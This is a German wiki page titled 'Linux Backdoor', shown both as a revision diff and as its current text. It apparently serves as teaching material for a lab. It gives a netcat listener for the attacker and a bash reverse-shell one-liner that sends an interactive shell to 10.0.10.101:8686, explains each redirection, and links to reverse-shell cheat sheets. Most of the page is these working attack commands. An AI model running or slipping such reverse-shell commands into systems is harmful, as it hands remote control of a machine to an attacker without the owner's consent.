Linux Backdoor: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(21 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=Angreifer=
 
=Angreifer=
IP Angreifer 10.81.70.249
+
IP Angreifer 10.0.10.101
 
*netcat -lp 8686
 
*netcat -lp 8686
 +
=Opfer=
 +
==So findet man es im Internet==
 +
*bash -i >& /dev/tcp/10.0.10.101/8686 0>&1
 +
==Für mich besser lesbar==
 +
*bash -i 1> /dev/tcp/10.0.10.101/8686 2>&1 0>&1
  
=opfer=
+
Standardausgabe wird an den Socket gehängt
*bash -i >& /dev/tcp/10.81.70.249/8668 0>&1
+
 
 +
Standardfehler wird an die Standardausgabe angehängt
 +
 
 +
Standardeingabe wird an die Standardausgabe angehängt
 +
 
 +
==bash -i > /dev/tcp/10.0.10.101/8686==
 +
Öffnet eine interaktive Shell und leitet die Standardausgabe den den Socket zu 10.0.10.101:8686
 +
==2>&1==
 +
Legt den Fehlerkanal zum Standardausgabekanal
 +
==0>&1==
 +
Legt den Standardeingabekanal zum Standardausgabekanal
 +
 
 +
=Links=
 +
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 +
*https://www.revshells.com/

Aktuelle Version vom 5. März 2024, 13:11 Uhr

Angreifer

IP Angreifer 10.0.10.101

  • netcat -lp 8686

Opfer

So findet man es im Internet

  • bash -i >& /dev/tcp/10.0.10.101/8686 0>&1

Für mich besser lesbar

  • bash -i 1> /dev/tcp/10.0.10.101/8686 2>&1 0>&1

Standardausgabe wird an den Socket gehängt

Standardfehler wird an die Standardausgabe angehängt

Standardeingabe wird an die Standardausgabe angehängt

bash -i > /dev/tcp/10.0.10.101/8686

Öffnet eine interaktive Shell und leitet die Standardausgabe den den Socket zu 10.0.10.101:8686

2>&1

Legt den Fehlerkanal zum Standardausgabekanal

0>&1

Legt den Standardeingabekanal zum Standardausgabekanal

Links